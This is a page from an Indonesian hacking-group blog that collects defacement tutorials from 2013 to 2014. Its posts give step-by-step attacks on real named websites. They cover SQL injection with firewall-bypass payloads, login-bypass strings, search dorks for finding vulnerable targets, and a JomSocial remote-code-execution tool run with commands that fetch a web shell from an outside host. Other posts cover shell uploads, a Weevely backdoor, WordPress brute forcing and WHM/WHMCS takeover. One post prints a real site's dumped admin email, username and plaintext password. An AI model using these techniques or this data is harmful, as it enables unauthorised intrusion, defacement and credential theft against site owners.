Showing posts with label Defacing. Show all posts
Showing posts with label Defacing. Show all posts
Sunday 20 April 2014

[Tutorial] Bypass WAF (Mod_Security)

0 comments
Assalamuallaikum sobat IDCA.
Setelah sekian lama engak ngepost masalah deface, nih kita mulai singgung lagi :D



Kali ini saya akan membahas tutorial mengenai Bypass WAF (Mod_Security) nah langsung aja bagi yang ingin belajar langsung ikutin tutorial dibawah :

1. Contoh target
http://www.harshstones.com/product-detail.php?id=35

2. Sekarang kita cari jumlah table databasenya dengan perintah " Order by "
http://www.harshstones.com/product-detail.php?id=35 order by 1-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 2-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 6-- Normal
http://www.harshstones.com/product-detail.php?id=35 order by 12-- Normal 
http://www.harshstones.com/product-detail.php?id=35 order by 13-- Error
Berarti jumlah table databasenya adalah 12

3. Sekarang kita cari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan perintah " union select ".
Sekarang kita jalankan perintahnya
http://www.harshstones.com/product-detail.php?id=-35 union select 1,2,3,4,5,6,7,8,9,10,11,12--
 

4. Sekarang kita bypass dengan perintah :

/*!50000UNION*/+/*!50000SELECT*/+1,2,concat/*!50000%280x3c62723e,table_name%29*/,4,5,6,7,8,9+from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+

5. Sekarang kita coba dengan site diatas :
http://www.harshstones.com/product-detail.php?id=-35/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12--
 

Nah sekian artikel yang bisa saya sampaikan, tutorial ini ditulis oleh AtzShahab di forum kami.
Jika ada kendala silahkan kunjungi link disini

Author : AtzShahab
Rew-Post by Bimo Septiawan
Continue reading →
Monday 31 March 2014

JomSocial 2.6 - Remote Code Execution

0 comments


Sudah lama tidak membahas mengenai deface mendeface, kesempatan kali ini admin akan memberikan trik deface yaitu "JomSocial 2.6 - Remote Code Execution" langsung saja silahkan simak tutorial dibawah :

JomSoc adalah perangkat komponen joomla yang memungkinkan Anda untuk membuat situs jaringan sosial canggih yang populer bebas penggunaannya dan open source software joomla.

Pada komponen Jomsocial versi 2.6 terdapat bug Rce ( Remote Code Execution ) yang memungkinkan attacker mengeksekusi kode� berbahaya untuk mengeksploitasi web yg memakai komponen ini.

Bahan sebelum beraksi download bahannya :

? Exploit
? Python 27

Step- step :

? Install Python
? Open cmd
? Masuk dir dimana exploit berada
? Jalankan exploit


Perintah:
1. exploit.py -u http://127.0.0.1/index.php -opsi

Macam opsi:
1. u -> url / web target format : http://situs.com/index.php
2. p -> mengeksekusi kode php : "echo 'Hello World!';"
3. s -> mengeksekusi command shell : "netstat -n" dll .
4. c -> menggunakan pemakaian functions : passthru

? Cara tanam shell

trik a:
1. exploit.py -u http://127.0.0.1/index.php -s "wget http:situs.com/shell.txt"
2. exploit.py -u http://127.0.0.1/index.php -s "mv shell.txt shell.php"

trik b:
1. exploit.py -u http://127.0.0.1/index.php -s "curl http:situs.com/shell.txt -o shell.php"

Demikian artikel yang dapat kami berikan, artikel ini kami ambil dari User Sanjungan Jiwa di forum kami, jika ada kendala atau masalah saat menjalankan tutorial ini silahkan langsung menuju threadnya disini.

Trimakasih,
Thanks to : Sanjungan Jiwa

Author : Bimo Septiawan

Continue reading →
Sunday 26 January 2014

Subgraph Vega Web Vulnerability Scanner

0 comments
Vega adalah scanner gratis dan open source dan platform penetration test untuk menguji keamanan aplikasi web. Vega dapat membantu Anda menemukan dan memvalidasi SQL Injection, Cross-Site Scripting (XSS),  mengungkapkan informasi sensitif, dan kerentanan lainnya. Scanner ini ditulis dalam bahasa Java, yang berbasis GUI, dan dapat berjalan pada Linux, OS X, dan Windows.

Vega mencakup scanner otomatis untuk pengujian secara cepat dan memiliki fitur proxy dalam pemeriksaan taktis. Vega scanner dapat menemukan XSS (cross-site scripting), injeksi SQL, dan kerentanan lainnya. Vega dapat dikembangkan dengan menggunakan API dalam bahasa web: Javascript.

FETURES

Modules
  • Cross Site Scripting (XSS)
  • SQL Injection
  • Directory Traversal
  • URL Injection
  • Error Detection
  • File Uploads
  • Sensitive Data Discovery
Core
  • Automated Crawler and Vulnerability Scanner
  • Consistent UI
  • Website Crawler
  • Intercepting Proxy
  • SSL MITM
  • Content Analysis
  • Extensibility through a Powerful Javascript Module API
  • Customizable alerts
  • Database and Shared Data Model

Untuk menjalaankan scanner ini dibutuhkan aplikasi Java sebagai pendukung.


Download Subgraph Vega Web Vulnerability Scanner :
Continue reading →
Wednesday 22 January 2014

Tutorial Bypass SQL Login

0 comments
Assalamuallaikum sobat IDCA :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"

Oke langsung  saja kita masuk ke tutorialnya :

[#] Dork

inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini

http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+

 

Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D

Sekian tutorial dari saya thanks to Mr Xenophobic ^_^

untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan saya perbarui dengan menambah macam erornya dan kenapa bisa masuk

Author : Bimo Septiawan
Continue reading →
Tuesday 24 December 2013

Deface Dengan WordPress Brute Force

0 comments
IDCA - Brute force adalah tekhnik dimana attacker memaksa masuk ke halaman admin suatu website dengan memanfaatkan random password yang telah mereka kumpulkan.

Pada kesempatakn kali ini admin akan memposting tutorial tutorial dari teman teman IDCA di forum kami ( www.idca.or.id ). Oke langsung saja admin akan share tutorial Brute Force Wordpress dengan script python.

Untuk pengguna LINUX, python sudah terinstal, sedangkan untuk pengguna windows harus menginstalnya terlebih dahulu.


Jika sudah terinstal python maka copy script python berikut ini dan save dengan ekstensi .py. Dan juga download Wordlistnya lalu save satu folder dengan file python.


Setelah itu, tentukan target. Terserah mau acak atau mau pentest web yang sudah ditentukan.
Ketahui dulu user yang digunakan di website tersebut, agar nanti proses bruteforce tidak sia-sia. Untuk mengetahui daftar user di web target bisa kalian scan dengan Flunym0us. Untuk yang belum tau, baca tentang flunym0us di : Flunym0us, Vulnerability Scanner for Wordpress and Moodle

Oke sekarang kita masuk ke tutorialnya :

1. Buka CMD lalu masuk ke folder dimana kalian menyimpan file python tadi ( cd/folder ) jika suda masuk  ketikan
[namafile].py -h http://[situstarget]/wp-login.php -u [username -P [wordlist].txt
contoh wpbf.py -h http://www.adriannecurry.org/wp-login.php -u adamjohn -P akicha.txt  
[Image: nabilaholic404.png]

2.  Tunggu prosesnya hingga selesai, jika sudah selesai maka akan muncul tulisan seperti berikut

[Image: step1.png]


3. Nah jika sudah dapat passwordnya sekarang tinggal login ke website target.

  • login wordpress itu terdapat di "localhost/wp-login.php"

[Image: step2.png]

4. Jika sudah berhasil masuk sekarang terserah kalian akan kalian apakan website tersebut :)


Sekian tutorial yang dapat kami berikan, tutorial ini admin ambil di thread salah satu Thread yang dibuat oleh member Indonesian Cyber Army ( Nabilaholic404 )

Refrensi : disini
Author : Bimo Septiawan
Continue reading →
Friday 20 December 2013

Exploit Wordpress Optimize Press

0 comments
Assalamuallaikum Wr Wb. Pada kesempatan kali ini kami akan memberikan tutorial "Exploit Wordpress Optimize Press". Sebetulnya exploit lama sih tapi apa salahnya kita share lagi :D

[+] BAHAN [+]

1. Shell
2. Kesabaran :D
3. Dork : inurl:/wp-content/themes/OptimizePress/lib/admin/media-upload.php ( Bisa kalian kembangin lagi )

[+] PoC [+]

1. Ketikan dork ke google


2. Jika sudah memilih salah satu website, kasih exploit :
"localhost/path/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
maka hasilnya akan seperti ini :
 

3. Setelah itu scroll ke bawah sampai ketemu tempat upload shell, lalu upload shell kalian. Jika berhasil akan muncul seperti dibawah ini.


4. Sekarang buka url yang muncul tadi di path 
"/home/path/public_html/wp-content/uploads/optpress/images_comingsoon/"
 
5. Nah sekarang tinggal upload script deface kalian :)

Nah udah tuh cuma itu aja, kalau belum juga dapat sabar aja ya masih ada ribuan web di google kok :)
Thanks !

Author : Bimo Septiawan
Continue reading →
Friday 1 November 2013

Backconnect dengan Weevely [ Back|Track 5 R3 ]

0 comments
Assalamualaikum sobat IDCA, kesempatan kali ini kami akan memberikan tutorial "Back connect" dengan Weevely untuk netcat nanti tutorialnya bisa menyusul. Sebelum melangkah ke tutorialnya kita berkenalan dulu dengan backconnect itu sendiri :D .


Apa itu backconnect ?
Backconnect biasanya digunakan untuk server yg tertutup proxy atau firewall. sehingga tidak bisa di lakukan remote connect. Jadi salah satu triknya adalah membalik koneksi, yaitu mengkoneksikan dari server ke komputer kita.

Oke, sudah sedikit jelas kan? kita lanjut ke tutorial heheh untuk pengguna windows harus instal  module python-redline dulu jika ingin menggunakan weevely ^_^

Bahan-bahan :

1. PC / Laptop yang terkoneksi dengan Internet
2. Website yang sudah ditanam shell
3. File Backdoor

Langkah-langkahnya :

1. Buka terminal ( atau tekan CTRL + ALT + T ) , lalu ketikan
cd /pentest/backdoors/web/weevely/" kemudian tekan enter ( Tampilan )


 2. Setelah itu kita buat backdoors dulu dengan cara, ketik :
./weevely.py generate [ namafile.php ] , contoh : "./weevely.py generate 0000 bim.php" ( Tampilan )


3. Jika sudah dibuat maka akan muncul tulisan "[generate.php] Backdoor file 'bim.php' created with password '0000'." sekarang coba cek filenya di dir/folder "pentest/backdoors/web/weevely"



4. Sekarang tinggal upload file tersebut ke web yang akan kita back connect.

5. Jika sudah berhasil di upload sekarang kembali ke terminal tadi, lalu ketikan :
./weevely.py [url file backdoors] [password]" sebagai contoh :
./weevely.py http://bimo-cyber.com/tmp/bim.php 0000  ( Tampilan )

Selamat sekarang anda sudah terhubung ke server target, nah untuk tutorial rooting saya bagis setelah dapat WIFI ya hehehe. Jika ada yang kurang jelas silahkan tanyakan di grup kami aja ya, jangan lewat INBOX :)

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Author : Bimo Septiawan







Continue reading →
Wednesday 23 October 2013

XAMPP Write Access Vulnerability

0 comments
Bismillahirrahmanirrahiim,

Sebelumnya saya mohon maaf, berhubung saya lagi males jadi saya ngasi tutorial yg saya copas dari blognya om MR. Xenopobic :D Selengkapnya, biar ga bingung karena tanpa ada gambarnya,,, silahkan kunjungi aja ke blognya Disini

buka website target, dan masukkan exploit berikut :

/xampp/lang.php?Hacked+By+Nicknamemu

nanti akan muncul sebuah pesan error, jika tidak ada pesan error itu artinya tidak vuln.

disini saya mendapatkan pesan error seperti ini :

lalu kita ganti "index.php" menjadi "lang.tmp"

selesai ^_^.

Sumber : Blognya Xenopobic :v

Continue reading →
Sunday 13 October 2013

Tutorial Exploit WHMCS 5.2.7 SQL Injection

0 comments


Assalamualaikum...


Sebelumnya saya sudah pernah membahas tentang Hack WHM, dan tutorial kali ini kita akan mengexploitasi bug yang terdapat pada web aplikasi WHMCS.. lalu pertanyaanya, apa bedanya WHM dan WHMCS??? Google sono :p :v

Thanks To : Mr. Xenophobic atas sumbangan targetnya untuk Tutorial ini :D
Dork :
intext:powered by whmcompletesolution
Pertama silahkan sobat mencari targetnya di google dengan memanfaatkan dork diatas.

Kemudian sobat diharuskan Register di web target.


Setelah Register, kita akan melakukan exploitasinya dengan menggunakan Exploiter berikut:
http://www.summer-radio.com/tmp/xe.php

Masukkan site target, email, dan password yg di daftarkan tadi, lalu klik Exploit!


Tunggu saja prosesnya, nanti akan muncul hasilnya :)


Setelah di dapat username,email, dan password admin, kemudian decrypt hashnya, utk decriptnya nya bisa sobat decrypt di md5decrypter.co.uk atau di web yang menyediakan service hash crack yang lain. ato bisa juga dengan Hashcat, dan lainnya yg udah dibahas diblog ini :)

Setelah password berhasil di decrypt, selanjutnya masuk ke halaman admin! contoh : http://site.com/whmcs/admin/login.php ), masukkan username & password admin dan login dah... setelah itu, terserah mo diapain... :)

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Content Creator : Onix AQua


Continue reading →
Thursday 10 October 2013

Exploit WordPress Complete Gallery File Upload

0 comments
Assalamualaikum sobat IDCA, karena lagi males bikin artikel jadi mending langsung aja menuju link dibawah yah >_<


TUTORIAL ADA DISINI


Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Continue reading →
Tuesday 8 October 2013

Cara Mendapatkan Banyak CPanel Dengan Mudah

0 comments
Assalamualaikum...

Lagi surfing di google, eh nemu yang beginian,, kocak! wkwkwkw ::D Yah, kali aja ada yang mau nyoba dan bisa dimanfaatin. :D yang ga berkenan, no komen aja :) Cukup simple aja..

Pertama gunakan dork untuk mencari Cpanelnya 
 inurl:":2082/login/?user="

Lalu masukkan dork ke box pencarian google, dan Enter.


Nah tinggal dibuka satu satu Cpanelnya yah :)


Maaf yah, kalo cuma begitu, lagi males ngapa2in :p Semoga bermanfaat aja :v

Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/



Content Creator: Onix AQua
Continue reading →
Friday 4 October 2013

SQL Injection Dengan DroidSQLi Di Android

0 comments
Indonesian Cyber Army - Assalamualaikum, Berhubung saya juga pengguna Android, jadi sedikit saya berbagi bagaimana melakukan exploitasi web yang vulnerable terhadap SQLinjection dengan menggunakan aplikasi DroidSQLI. aplikasi ini sama halnya dengan Havij yang biasa digunakan di OS Windows, hanya saja mungkin fitur2nya yang membedakannya disini.


Silahkan sobat download dulu aplikasinya dan install ke OS Android Smartphone sobat, donlot aja melalui Playstore maupun sobat cari sendiri di google udah banyak :p

Note: Tidak semua website memiliki celah SQLi, So find them before exploiting :p

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua
Pertama, silahkan sobat cari aja target yang akan di exploitasi. gunakan dork atau pake apa aja terserah :p harap di cek dulu bahwa web yang akan diexploitasi tersebut memiliki bug/ celah / kerentanan terhadap SQLinjection. untuk mengetahuinya cukup mudah, sobat tinggal menambahkan tanda petik ( ' ) diakhir url. contoh target saya : http://www.eastodissa.ac.in/news-and-events.php?id=22' setelah ditambahin tanda petik ( ' ) maka akan muncul error yang menandakan bahwa web tersebut memiliki celah SQLinjection.  lihat gambar!


Kemudian masukan web target yang vuln SQLi ke Target Url lalu klik Inject!


Kalo proses injectnya berhasil, maka akan muncul Databasenya. silahkan pilih databasednya untuk mencari Tabel. dalam target saya disini nama databsenya adalah nilakantatrust.


Proses selanjutnya akan muncul Tabel, disini kita akan mencari letak user dan password admin. jadi saya memilih Table est_admin.


 Nah, dalam Tabel tersebut, ada beberapa column yang berisikan data admin. silahkan diceklish Column yang ingin di dump datanya. lalu klik Get Records


Maka akan muncul isi data yang ada pada column tersebut berupa data admin seperti email, username, dan password.


Nah dari column tadi kita dapatkan data yaitu:

Emailid : sswain@isandt.com
Last Loggin : 2013-09-26
Password : isti$$9!5!2013
Signature : Sanjay Kumar Swain
user id : trustadmin

Selanjutnya sobat tinggal mencari halaman adminnya, dan login ke panel admin. seandainya passwordnya berbentuk Hash, maka password tersebut harus di crack terlebih dahulu.Walaupun secara kasat mata, teknik ini sangat mudah apa lagi dengan menggunakan Automatic Tools, tapi cukup sulit juga. beberapa kasus dan kendala yang banyak dihadapi dalam melakukan SQLi yaitu  sulitnya menemukan halaman loggin serta password Hashnya. Disini kita banyak membutuhkan kesabaran dan ketekunan karena tidak ada yg mudah dalam dunia Hacking :p

Sekian tutorial yg dapat saya berikan, jika ada kekurangan mohon di perbaiki :) CMIIW :D semoga bermanfaat yah, wassalam.. :)


Content Creator : Onix AQua





Continue reading →
Tuesday 1 October 2013

Arbitrary File Upload On MediaApie

0 comments
Assalamualaikum Wr.Wb ketemu lagi dengan coretan saya yang semrawut hehe. :D
Kesempatan kali ini, saya akan share tutorial Deface yang dibuat oleh temen saya sendiri :D


Okay tanpa basa basi, langsung aja ke tutorialnya :D

#Dork : intitle:"intext:Website by MediaPie"

#POC :

Jika sudah menemukan target dengan dork tadi, pakai exploit diatas, sehingga menjadi :
www.target.com/admin/ajaxfilemanager/ajaxfilemanager/ajaxfilemanager.php

1. Jika sudah, kalian klik "Upload"

2. Jika sudah, pilih file .txt kalian ( karena hanya support txt saja )


3. Jika sukses, cara memanggil filenya yaitu :
http://site-target/admin_images/[YOURFILE]
Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua 

Demo Target :

http://theenglishcaravancompany.com/
http://myholidaymonkey.com/
http://creativecouriers.com/ 
http://edenlondon.com/devsite/

This Exploit not support php, html , png, gif

Okay, udah itu ajaa :D
sebelum mengakiri tutorial hari ini, saya ucapkan trimakasih buat temen saya :D

Sumber : http://newbie-security.or.id/

Content Created By Garuda Dot ID


Continue reading →
Monday 30 September 2013

Bugs XSS di CMS Blogger

0 comments
IDCA - Bingung mau nulis artikel apa -_-
terpaksa bikin asal-asalan aja hahaha :D

Bugs XSS di CMS blogger udah berhasil ditemukan, gatau udah lama apa saya yang baru tau tapi intinya saya baru tau tadi sore setelah temen saya INBOX ane link http://indocyberarmy.blogspot.com/ ada bug XSSnya tapi bodo amat dah hahaha :D

Okay, penasaran ?

Exploit :

/feeds/posts/

Poc :

Saya kasih contoh blog saya sendiri aja ya :D

http://bimo-cyber.org/feeds/posts/Hacked_By_Garuda_Dot_ID

Warna merah ganti sesuka hati kalian :D

Tampilan :


Okay dah gitu aja bye :D

Content Created By Bimo Septiawan

Continue reading →
Saturday 28 September 2013

Tool Scanner Exploit Com User

0 comments
Assalamualaikum...

Tanpa panjang lebar mukadimah, nih ada tool untuk memudahkan sobat dalam menemukan target exploit com_user.  Silahkan di sedot aja..

Download

Silahkan sobat upload di shell sobat, kalo ga punya shell  dan ga mau repot2, silahkan gunakan punya saya saja :p

Com_User Scanner

Perlu sobat ketahui,

Tool ini cuma berfungsi buat checking aja, jadi walaupun hasilnya Infected belum tentu web tersebut bisa berhasil di exploitasi dengan exploit com_user. jadi kalo ga bisa, silahkan cari target yg lainnya. yah, yg namanya hacking itu ga ada yg gampang, apa2 butuh kerja keras dan selalu sabar dlm berusaha... :p

Untuk menggunakannya cukup mudah, tinggal masukkan url target, dan klik Scan Site :)


Kemudian tinggal ditunggu aja hasilnya...


Nah kalo sudah nemu web target, tinggal dicoba aja satu2,, kali aja bisa didepes, wkwkwk kalo yg belum tau caranya, silahkan baca tutorialnya disini :)  udah bigtu saja yah, mudah2an bermanfaat. Salam :p


Content Creator:: Onix AQua


Continue reading →
Tuesday 24 September 2013

Exploit Com_Redmystic

0 comments
Indonesian Cyber Army - Selamat siang soba IDCA huehehe, lagi pulang sekolah tiba-tiba om ID Ozie   ngeshare exploit baru yang didapat di forum luar okay dah udah dapa ijin langsung share ajaaa hahaha :D

[+] Dork [+]

inurl:/index.php?option=com_redmystic

[+] Exploit [+]

/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php 

[+] POC [+]

1. Ambil script dibawah ini, lalu save dengan ekstensi .php kemudian upload ke web / bisa lewat XAMPP


#Note: Mohon tidak menghilangkan greetz pada script diatas, Hargai orang lain jika ingin dihargai :)

2. Okay langsung aja ke langkah-langkahnya :) pergi ke search engine ( google / bing / dll ) lalu masukan dork diatas.

3. Sekarang buka web dibawah atau langsung bisa ke web dimana anda mengupload file diatas :)



4. Masukan target di kolom yang tersedia, lalu klik exploit. Jika berhasil maka akan muncul tulisan dibawah kolom textarea :)


5. Nah, kalau udah kayak gitu tinggal akses aja deh :)


6. Nah muncul Uploader kan ? kalau gagal berati engak vuln  atau udah di utak atik sama adminnya hahaha :D dah tinggal upload shell / script aja :)


7. Shell udah ditangan ? sekarang terserah anda mau di apain :D

Sekian tutorial yang bisa kami sampaikan, jika ada yang kurang jelas silahkan ditanyakan ke Grup kami :D


Tutorial Video :


Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua 


Jika ada masalah seputar tutorial yg ada disini sobat bisa tanyakan dan diskusikan di forum kami http://forum.idca.or.id/

Content Creator : Bimo Septiawan

#Thank's To ID Ozie



Continue reading →
Thursday 19 September 2013

Tools JCE Server Scanner (Python & PHP)

0 comments
Assalamualaikum...


Berhubung saya lupa2 mulu mo posting ni tools, jadi maaf aja kalo udah telat hehehe :D Fungsi dari tools scanner ini yaitu memudahkan mencari target website dalam satu server yang vulnerable terhadap JCE secara otomatis sehingga tanpa harus mengecek vulnerabilitas webnya satu persatu :) silahkan di sedot aja yah :)

1. JCE Scanner (Python)


2. JCE Scanner (PHP)


Cara penggunaannya cukup simple, untuk menggunakan tools ini sobat harus menginstall Python dan PHP sebagai pendukung, karena kedua tools ini dibuat dari bahasa Python dan PHP :) disini sobat hanya memasukkan IP web targetnya, kemudian biarkan tools bekerja mencari web yang vuln JCE :D untuk tutorial JCE silahkan baca artikel sebelmnya disini Begitu saja yang bisa saya berikan, mudah2an bisa bermanfaat buat sobat semua...

Content Creator : Onix AQua
Continue reading →
Tuesday 17 September 2013

Hack Web Host Manager (WHM)

0 comments


Assalammualaikum�

Hallo sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo hacking2an.. hehehe :D  oke sekarang saya mo bahas mengenai cara Hack Web Host Manager (WHM) :p

Apa itu Web Host Manager (WHM) ? >>>> Google aja yah :p

Sebelum itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol :D Nah, Kalo hack WHM, disini kita butuh Config WHMCSnya  :3  ga semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri yah :p  utk config killernya bisa gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita sebelumnya Cara mencari config dalam website

Perhatian!
Tutorial ini dibuat sebagai pengetahuan dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak bertanggung jawab! Use at your own risk! 

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua

Berikut bahan2 yg sobat butuhkan:

  1. Web Shelled 
  2. Whmcs killer 
  3. Config whmcs

Disini saya udah nemu config WHMnya :



 isi dalamnya seperti :



Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!





Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p


Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account


 Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087

cth: 176.32.342.223:2086



udah pada bisa kan?  kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:

Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini




kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.


Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!




kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:

Header Name : Authorization
Header Value : WHM username:AccessHash




 Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start



Setelah itu tinggal sobat buka WHMnya.. IP:Port



Mudah kan? :D semoga saja tutorial ini bermanfaat dan tidak disalahgunakan :) kalo disalahgunakan resiko dan Dosanya tanggung sendiri yah? :p Spesial big thanks to : Mauritania Attacker :* saya dapet ilmu dari blognya :3 dan sekian tutorial dari saya yah,  maaf kalo masih semerawut :D

 









Content Creator : Onix AQua


Continue reading →